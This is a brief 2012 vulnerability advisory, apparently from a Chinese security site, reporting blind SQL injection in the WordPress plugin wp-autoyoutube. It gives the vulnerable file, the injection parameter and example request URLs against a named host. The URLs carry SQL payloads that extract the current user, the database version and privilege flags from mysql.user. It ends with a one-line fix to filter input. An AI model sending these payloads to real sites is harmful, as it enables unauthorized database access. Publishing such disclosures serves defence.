WordPress Plug-In wp-autoyoutube blind defect and repair-vulnerability warning-the black bar safety net

2012-01-14T00:00:00
ID MYHACK58:62201232900
Type myhack58
Reporter 佚名
Modified 2012-01-14T00:00:00

Description

Title: WordPress wp-autoyoutube plugin Blind SQL Injection

Vulnerability

Author: longrifle0x

Software: Wordpress

Download address:http://wordpress. org/extend/plugins/wp-autoyoutube/

Test tool: SQLMAP

Overview

Wordpress Plug-In wp-autoyoutube is found that the presence of blind issues

File:

wp-content/plugins/wp-autoyoutube/modules/index.php

Test method: id=-1; or 1=if

Test

http://www.badguest.cn /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()

http://www.badguest.cn /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE

WHEN ((SELECT super_priv FROMmysql. user WHERE user='None' LIMIT

0,1)='Y') THEN 1 ELSE 0 END)

http://www.badguest.cn /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)

Provide solution

wp-content/plugins/wp-autoyoutube/modules/index. php filter the page to input parameters